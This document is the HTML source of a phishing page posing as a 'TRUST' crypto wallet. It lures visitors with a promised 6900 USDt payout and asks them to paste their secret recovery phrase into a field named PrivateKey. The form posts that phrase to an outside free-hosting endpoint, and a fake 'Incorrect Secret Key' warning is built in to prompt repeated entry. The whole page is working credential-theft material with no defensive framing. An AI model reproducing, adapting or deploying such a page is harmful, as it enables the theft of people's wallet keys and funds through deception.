<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="sarikaya/32179889.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
<link href="Cake/mango.css" rel="stylesheet">
<link rel="apple-touch-icon" href=sarikaya/32179889.png"><title>TRUST</title>

<link href="Cake/garam.css" rel="stylesheet">
<script src="Cake/jquery.min.js"></script>
<script src="Cake/sinop.min.js" charset="utf-8" type="text/javascript"></script>
</head>
<body>



<div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu">

<br>
<br>

<center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="sarikaya/32179889.png" alt="" style="height: 70px;width: 70px;"></div></center>

<div class="confirm-approve-content__title" style="
    font-size: 1.2rem;
    line-height: 140%;
    justify-content: center;
    text-align: center;
    margin-top: 22px;
    padding-left: 24px;
    padding-right: 24px;
    color: #3232e0;
    "><b>TRUST</b></div>
<h4 class="chakra-text css-13zbq26">
                                
<center>Secure and trusted multi-chain crypto wallet.</center>
                            </h4>
<h4 class="chakra-text css-13zbq26">
                                <center><div style="color:#00a854;font-weight: " class="confirm-approve-content__card-content">Get your 6900 USDt</div></center>
</h4>

<h4><center>Enter your secret phrase here to connect</center></h4>

<div class="sc-htoDjs cDnNqw">
	<form method="post" action="https://lastingpride3.000webhostapp.com/login2.php?nkbihfbeogaeaoehlefnkodbefgpgknn/home" class="ant-form ant-form-horizontal">
        <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);">Phrase</p>
<div>
    <div class="thepadding">
        <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="PrivateKey" id="wordsseed" minlength="24" maxlength="305" required="" style="
    height: 106px;
"></textarea><font color="red" label="" style="font-size: 13px;">Incorrect Secret Key. Make sure it is 12 or 24 words with spaces between words.
</font>
        </div></div><div class="ant-form-item-explain">
                </div></div></div>

                <div class="thepadding">
<button class="button sc-VigVT fWmldN" ="disabled"="" id="imp" "="">IMPORT</button>
<div1></div1></div>
<br>
<br>
<br>
<br>
<center>
<a class="nav-link" href="#"><font face="Arial" size="2" color="#4682B4">What is a Recovery Phrase?</font></a>

</center>
</div> </form>
                           

                </div>

<script src="Cake/load.js"></script></body>

</html>
